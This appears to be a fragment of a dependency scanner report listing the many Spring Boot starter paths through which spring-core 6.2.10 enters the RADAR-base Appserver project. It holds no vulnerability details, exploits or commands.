Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
